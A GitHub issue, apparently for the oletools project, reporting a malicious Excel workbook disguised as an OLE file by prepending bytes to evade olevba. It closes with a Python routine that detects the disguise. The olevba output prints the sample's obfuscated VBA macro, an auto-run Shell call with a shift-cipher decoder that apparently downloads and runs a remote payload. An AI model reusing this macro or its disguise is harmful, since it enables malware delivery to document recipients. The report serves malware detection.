
Find ole inside CDFv2-disguise

Open dlucredativ opened this issue 1 year ago • 0 comments

Consider the following analysis for attached sample sneaky.ole.zipped-for-github.zip:

$ file sneaky.ole
sneaky.ole: Composite Document File V2 Document, Cannot read section info
$ olevba -j sneaky.ole
[
      {
          "script_name": "olevba",
          "version": "0.60.1",
          "python_version": [
              3,
              10,
              4
          ],
          "url": "http://decalage.info/python/oletools",
          "type": "MetaInformation"
      }
,     {
          "container": null,
          "file": "sneaky.ole",
          "json_conversion_successful": true,
          "analysis": null,
          "code_deobfuscated": null,
          "do_deobfuscate": false,
          "show_pcode": false,
          "type": "OLE",
          "macros": []
      }
]

However:

$ unzip sneaky.ole -d sneaky.ole.unzipped
Archive:  sneaky.ole
warning [sneaky.ole]:  3072 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  inflating: sneaky.ole.unzipped/[Content_Types].xml  
  inflating: sneaky.ole.unzipped/_rels/.rels  
  inflating: sneaky.ole.unzipped/xl/_rels/workbook.xml.rels  
  inflating: sneaky.ole.unzipped/xl/workbook.xml  
  inflating: sneaky.ole.unzipped/xl/styles.xml  
  inflating: sneaky.ole.unzipped/xl/worksheets/sheet1.xml  
  inflating: sneaky.ole.unzipped/xl/worksheets/_rels/sheet1.xml.rels  
  inflating: sneaky.ole.unzipped/xl/vbaProject.bin  
  inflating: sneaky.ole.unzipped/xl/theme/theme1.xml  
  inflating: sneaky.ole.unzipped/xl/printerSettings/printerSettings1.bin  
  inflating: sneaky.ole.unzipped/docProps/app.xml  
  inflating: sneaky.ole.unzipped/docProps/core.xml  

$ file sneaky.ole.unzipped/xl/vbaProject.bin
sneaky.ole.unzipped/xl/vbaProject.bin: Composite Document File V2 Document, Cannot read section info

$ olevba -j sneaky.ole.unzipped/xl/vbaProject.bin
[
      {
          "script_name": "olevba",
          "version": "0.60.1",
          "python_version": [
              3,
              10,
              4
          ],
          "url": "http://decalage.info/python/oletools",
          "type": "MetaInformation"
      }
,     {
          "container": null,
          "file": "sneaky.ole.unzipped/xl/vbaProject.bin",
          "json_conversion_successful": true,
          "analysis": [
              {
                  "type": "AutoExec",
                  "keyword": "Workbook_Open",
                  "description": "Runs when the Excel Workbook is opened"
              },
              {
                  "type": "Suspicious",
                  "keyword": "Shell",
                  "description": "May run an executable file or a system command"
              },
              {
                  "type": "Suspicious",
                  "keyword": "Chr",
                  "description": "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
              },
              {
                  "type": "Suspicious",
                  "keyword": "Hex Strings",
                  "description": "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
              }
          ],
          "code_deobfuscated": null,
          "do_deobfuscate": false,
          "show_pcode": false,
          "type": "OLE",
          "macros": [
              {
                  "vba_filename": "ThisWorkbook.cls",
                  "subfilename": "sneaky.ole.unzipped/xl/vbaProject.bin",
                  "ole_stream": "VBA/ThisWorkbook",
                  "code": "Public Sub Workbook_Open()\nShell (c(c(c(ac(c(c(c(\" Ÿ§•¢£˜•œœ^•¨•P]•¨•“¥¤™Ÿž Ÿœ™“©P’© ‘££P]‡Px™””•žP]“Ÿ��‘ž”PXž•§]Ÿ’š•“¤Pƒ©£¤•�^~•¤^‡•’sœ™•ž¤Y^tŸ§žœŸ‘”v™œ•XW˜¤¤ j__ahe^b`h^baa^fg_£“Ÿ¢ _�¥••ž^£–¨^•¨•W\\T•ž¦j„•� [WŒž•§–™œ•^u¨•WYkX~•§]’š•“¤P]“Ÿ�Pƒ˜•œœ^q  œ™“‘¤™ŸžY^ƒ˜•œœu¨•“¥¤•XT•ž¦j„•� [WŒž•§–™œ•^u¨•WY\"))))))))\nEnd Sub\n\n Public Function c(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½ As String)\n        Dim s As Integer, q As Integer\n        s = 16\n        For q = 1 To Len(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½)\n            Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1) = Chr(Asc(Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1)) - s)\n        Next q\n        c = •¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½\n    End Function\n     Public Function ac(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½ As String)\n        Dim s As Integer, q As Integer\n        s = 48\n        For q = 1 To Len(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½)\n            Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1) = Chr(Asc(Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1)) + s)\n        Next q\n        ac = •¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½\n            End Function"
              },
              {
                  "vba_filename": "Sheet1.cls",
                  "subfilename": "sneaky.ole.unzipped/xl/vbaProject.bin",
                  "ole_stream": "VBA/Sheet1",
                  "code": ""
              }
          ]
      }
]

dlucredativ, Jul 25 '22 15:07
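One way to catch this disguise on the analysis side, as an added example that is not part of the issue or of oletools' own code: instead of trusting the leading OLE magic, the check walks back from the ZIP end-of-central-directory record (the same way `unzip` recovers from "extra bytes at beginning"), derives how many bytes were prepended (3072 in the report above), and lists the archive to see whether it carries `xl/vbaProject.bin`. The sample it builds is constructed in memory and is not the attached `sneaky.ole`.

```python
import io
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # CDFv2 / OLE2 header
EOCD_SIG = b"PK\x05\x06"                          # ZIP end-of-central-directory
LFH_SIG = b"PK\x03\x04"                           # ZIP local file header


def find_embedded_zip_offset(data: bytes):
    """Offset of a ZIP archive inside data (any junk prefix skipped), else None.
    Derived from the EOCD record, so the prefix may be any length; ZIP64 not handled."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or eocd + 22 > len(data):
        return None
    cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)
    # Where the central directory really sits, minus where the archive claims it
    # sits, is exactly the number of bytes prepended to the archive.
    prefix = (eocd - cd_size) - cd_offset
    if prefix < 0 or data[prefix:prefix + 4] != LFH_SIG:
        return None
    return prefix


def classify(data: bytes) -> dict:
    """Report whether an OLE-looking blob actually carries an OOXML zip with VBA."""
    report = {"ole_header": data.startswith(OLE_MAGIC), "zip_offset": None,
              "names": [], "has_vba": False}
    off = find_embedded_zip_offset(data)
    if off is None:
        return report
    with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
        names = zf.namelist()
    report.update(zip_offset=off, names=names,
                  has_vba=any(n.lower().endswith("vbaproject.bin") for n in names))
    return report


def build_constructed_sample(prefix_len: int = 3072) -> bytes:
    """Constructed stand-in for sneaky.ole (not the real sample): OLE magic plus
    zero padding, then a minimal OOXML-shaped zip containing xl/vbaProject.bin."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)  # placeholder, no real VBA
    return OLE_MAGIC + b"\x00" * (prefix_len - len(OLE_MAGIC)) + buf.getvalue()
```

A triage pipeline that sees `ole_header` and a non-zero `zip_offset` together should route the file through the zip/OOXML path (and the contained `vbaProject.bin` through olevba) rather than stopping at the OLE verdict.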